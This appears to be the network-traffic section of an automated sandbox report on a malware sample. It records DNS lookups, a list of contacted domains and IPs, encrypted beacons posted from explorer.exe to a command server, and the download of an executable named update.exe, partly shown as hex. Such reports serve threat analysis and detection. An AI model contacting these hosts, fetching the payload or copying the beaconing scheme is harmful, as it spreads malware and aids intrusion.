                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973285913 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.975954056 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:24:10.009982109 CEST1.1.1.1192.168.2.80x6ac8No error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276562929 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:13.276607037 CEST1.1.1.1192.168.2.80xec1dNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • whispedwoodmoodsksl.shop
                                                            • steamcommunity.com
                                                            • 37.27.34.12
                                                            • spqqefesecvvfpt.net
                                                              • dbfhns.in
                                                            • dxgcikcstvjhw.org
                                                            • deiljvysjqajyam.com
                                                            • tgeabjhcrwocia.org
                                                            • hfipxhiwprpsvl.net
                                                            • mdyttvvsjifyxv.com
                                                            • 45.129.96.86
                                                            • faqldvcxoayalcyp.com
                                                            • nspuoowkrfsuk.com
                                                            • gcvwrsnytusejtdk.com
                                                            • jebcasiwwjgorbsq.net
                                                            • 23.145.40.124
                                                            • 185.235.137.54
                                                            • bshlmattfttfdb.com
                                                            • bngikvknmtdpor.org
                                                            • 91.202.233.231
                                                            • amkihwobrgvem.org
                                                            • bdtrshdmdsajiin.net
                                                            • depvhlbmmte.com
                                                            • barvntqgmwgcruw.net
                                                            • cmmajutpfcykk.com
                                                            • jrlquvadpwx.org
                                                            • lmlmhdjgxcsr.com
                                                            • dhyltqofxhpe.net
                                                            • nxoumlltphj.com
                                                            • etetxpvheghmlur.net
                                                            • spdxbqopubx.org
                                                            • pxinixbdcjjccvdo.com
                                                            • euirtythbemo.net
                                                            • btndjessgdxlt.net
                                                            • nfymgppnbopwxnwd.net
                                                            • ckgltynaavllsolq.com
                                                            • hbtkypdfbiu.net
                                                            • haglmiwlgvefe.net
                                                            • dnvpkenpnlmca.org
                                                            • qvgxhyimdjdqth.org

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849708190.13.174.94804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:26.259476900 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://spqqefesecvvfpt.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 286
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:26.259500980 CEST286OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 19 b3 88
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu<KPS<lE5QA=rM*:B/5OQYwkWM_\%/|'&27aLjru7cJP%@H3
                                                            May 27, 2024 15:23:27.605427980 CEST152INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:27 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 04 00 00 00 72 e8 85 ed
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849709190.13.174.94804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:27.616899014 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dxgcikcstvjhw.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 141
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:27.616920948 CEST141OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 2d a8 8c
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vue-RQZ_kNSDrrdH&V#/FF_S3
                                                            May 27, 2024 15:23:28.913645029 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:28 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849710190.13.174.94804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:28.922755003 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://deiljvysjqajyam.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 270
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:28.922775984 CEST270OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 73 4c ce 82
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vusLg/nfZYV2NM'76{I9Lc{0!}| #0nro\_]m'YmA%JrVPGcQk<4q
                                                            May 27, 2024 15:23:30.206592083 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849711190.13.174.94804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:30.215168953 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://tgeabjhcrwocia.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 135
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:30.215184927 CEST135OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 20 1c d1 ff
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu L>rr$+h8GRT5z$
                                                            May 27, 2024 15:23:31.516701937 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:31 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849712190.13.174.94804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:31.525949001 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hfipxhiwprpsvl.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 163
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:31.525976896 CEST163OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 1e a5 be
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vuP4fek;1d=3xVuFIWE=WXQRM^Ei
                                                            May 27, 2024 15:23:32.806087971 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.853061190.13.174.94804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:33.065018892 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://mdyttvvsjifyxv.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 175
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:33.065018892 CEST175OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6e 23 ff e7
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vun#wAQKv4l\`z47R@\Y&7a~W-/!oRzWE*
                                                            May 27, 2024 15:23:34.366200924 CEST191INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:34 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                            Data Ascii: #\-^$aD++3^|


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.85306445.129.96.86804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:34.376410007 CEST165OUTGET /file/update.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 45.129.96.86
                                                            May 27, 2024 15:23:35.048965931 CEST1236INHTTP/1.1 200 OK
                                                            Server: nginx/1.22.1
                                                            Date: Mon, 27 May 2024 13:23:34 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 325120
                                                            Last-Modified: Mon, 27 May 2024 13:20:02 GMT
                                                            Connection: keep-alive
                                                            ETag: "66548882-4f600"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[7:Y:Y:Yh:Yh:Yh:YB:Y:X:Y1:Yh:Y1:YRich:YPELct= @pdHx@ d.text3 `.rdatal n@@.dataF~@.rsrcL@@
                                                            May 27, 2024 15:23:35.049016953 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 24 c5 48 00 e8 27 02 00 00 68 29 1b 41 00 e8 0f 24 00 00 59 c3 b9 2c c5 48 00 e8 7a 02 00 00 68 1f 1b 41
                                                            Data Ascii: $H'h)A$Y,HzhA#YHhA#Yj HjHj(HjHUQQQQ$]EYY]UQQQQ$$]EYY]UE]
                                                            May 27, 2024 15:23:35.049053907 CEST1236INData Raw: 89 45 e4 8b 4d e8 8b c3 d3 e8 89 45 f8 8b 45 d4 01 45 f8 8b 45 f8 33 45 e4 31 45 fc 8b 45 fc 29 45 ec 8b 4d d0 81 c7 47 86 c8 61 89 7d f0 4e 0f 85 29 ff ff ff 8b 75 cc 8b 45 ec 5f 89 5e 04 89 06 5e 5b 8b e5 5d c3 56 8b 35 08 c5 48 00 c1 ee 03 57
